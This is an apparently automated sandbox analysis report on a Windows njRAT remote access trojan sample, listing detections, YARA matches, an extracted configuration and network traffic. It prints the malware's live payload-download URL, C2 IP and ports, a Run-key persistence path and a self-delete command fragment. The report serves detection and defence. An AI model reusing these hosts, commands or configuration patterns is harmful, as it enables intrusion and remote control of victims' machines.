Edit tour

Windows Analysis Report
bRMW.exe

Overview

General Information

Sample Name:bRMW.exe
Analysis ID:1346678
MD5:fa139ae9c858237134267631faea725b
SHA1:47761a9ab45df5ee6cb016252b598906c60b92d9
SHA256:2f8ea8aa8c05d94beedf55231e5a354534d3c8ff9c57e6a78ee58c6d9ed533d9
Tags:exenjRat
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Njrat
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
.NET source code contains potential unpacker
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • bRMW.exe (PID: 2748 cmdline: C:\Users\user\Desktop\bRMW.exe MD5: FA139AE9C858237134267631FAEA725B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{
  "Host": "https://pt.textbin.net/download/rcd5ihynxw",
  "Port": "5552",
  "Version": "0.7d By Pjoao1578",
  "Registry Name": "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
  "Campaign ID": "HacKed",
  "Network Seprator": "|'|'|"
}
SourceRuleDescriptionAuthorStrings
bRMW.exeJoeSecurity_NjratYara detected NjratJoe Security
    bRMW.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      bRMW.exeWindows_Trojan_Njrat_30f3c220unknownunknown
      • 0x49e4:$a1: get_Registry
      • 0x55d0:$a3: Download ERROR
      • 0x5520:$a4: cmd.exe /c ping 0 -n 2 & del "
      bRMW.exeCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
      • 0x5520:$x1: cmd.exe /c ping 0 -n 2 & del "
      • 0x55ee:$s3: Executed As
      • 0x55d0:$s6: Download ERROR
      bRMW.exeMALWARE_Win_NjRATDetects NjRAT / BladabindiditekSHen
      • 0x5520:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
      • 0x55ac:$s4: Execute ERROR
      • 0x5608:$s4: Execute ERROR
      • 0x55d0:$s5: Download ERROR
      • 0x520c:$s6: [kl]
      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_NjratYara detected NjratJoe Security
        00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
        • 0x47e4:$a1: get_Registry
        • 0x53d0:$a3: Download ERROR
        • 0x5320:$a4: cmd.exe /c ping 0 -n 2 & del "
        Process Memory Space: bRMW.exe PID: 2748JoeSecurity_NjratYara detected NjratJoe Security
          SourceRuleDescriptionAuthorStrings
          0.0.bRMW.exe.ff0000.0.unpackJoeSecurity_NjratYara detected NjratJoe Security
            0.0.bRMW.exe.ff0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.0.bRMW.exe.ff0000.0.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
              • 0x49e4:$a1: get_Registry
              • 0x55d0:$a3: Download ERROR
              • 0x5520:$a4: cmd.exe /c ping 0 -n 2 & del "
              0.0.bRMW.exe.ff0000.0.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
              • 0x5520:$x1: cmd.exe /c ping 0 -n 2 & del "
              • 0x55ee:$s3: Executed As
              • 0x55d0:$s6: Download ERROR
              0.0.bRMW.exe.ff0000.0.unpackMALWARE_Win_NjRATDetects NjRAT / BladabindiditekSHen
              • 0x5520:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67
              • 0x55ac:$s4: Execute ERROR
              • 0x5608:$s4: Execute ERROR
              • 0x55d0:$s5: Download ERROR
              • 0x520c:$s6: [kl]
              No Sigma rule has matched
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 0.0.bRMW.exe.ff0000.0.unpackMalware Configuration Extractor: Njrat {"Host": "https://pt.textbin.net/download/rcd5ihynxw", "Port": "5552", "Version": "0.7d By Pjoao1578", "Registry Name": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HacKed", "Network Seprator": "|'|'|"}
              Source: bRMW.exeReversingLabs: Detection: 89%
              Source: bRMW.exeVirustotal: Detection: 73%Perma Link
              Source: Yara matchFile source: bRMW.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.1994678627.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: bRMW.exe PID: 2748, type: MEMORYSTR
              Source: bRMW.exeAvira: detected
              Source: http://pt.textbin.netAvira URL Cloud: Label: phishing
              Source: https://pt.textbin.netAvira URL Cloud: Label: phishing
              Source: https://pt.textbin.net/download/rcd5ihynxwAvira URL Cloud: Label: malware
              Source: http://textbin.netAvira URL Cloud: Label: phishing
              Source: 0.tcp.sa.ngrok.ioVirustotal: Detection: 14%Perma Link
              Source: textbin.netVirustotal: Detection: 12%Perma Link
              Source: pt.textbin.netVirustotal: Detection: 10%Perma Link
              Source: http://textbin.netVirustotal: Detection: 12%Perma Link
              Source: https://pt.textbin.netVirustotal: Detection: 8%Perma Link
              Source: https://pt.textbin.net/download/rcd5ihynxwVirustotal: Detection: 10%Perma Link
              Source: http://pt.textbin.netVirustotal: Detection: 10%Perma Link
              Source: bRMW.exeJoe Sandbox ML: detected
              Source: bRMW.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49774 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49775 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49776 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49777 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49779 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49781 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49782 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49790 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49793 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49797 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49809 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49810 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49811 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49813 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49815 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49817 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49818 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49819 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49820 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49823 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49826 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49827 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49828 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49829 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49830 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49831 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49832 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49833 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49836 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49837 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49839 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49841 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49842 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49843 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49844 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49845 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49847 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49848 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49850 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49851 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49852 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49853 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49854 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49855 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49856 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49857 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49859 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49860 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49861 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49862 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49863 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49864 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.5:49865 version: TLS 1.2
              Source: bRMW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mscorlib.pdb source: bRMW.exe, 00000000.00000002.4455595232.0000000006E40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: bRMW.exe, 00000000.00000002.4455249840.0000000005A5B000.00000004.00000010.00020000.00000000.sdmp

              Networking

              barindex
              Source: Yara matchFile source: bRMW.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.bRMW.exe.ff0000.0.unpack, type: UNPACKEDPE
              Source: Malware configuration extractorURLs: https://pt.textbin.net/download/rcd5ihynxw
              Source: Joe Sandbox ViewASN Name: AS-30083-GO-DADDY-COM-LLCUS AS-30083-GO-DADDY-COM-LLCUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewIP Address: 18.229.248.167 18.229.248.167
              Source: Joe Sandbox ViewIP Address: 148.72.177.212 148.72.177.212
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.net
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /download/rcd5ihynxw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: pt.textbin.netConnection: Keep-Alive
              Source: global trafficTCP traffic: 192.168.2.5:49705 -> 18.229.248.167:11137
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
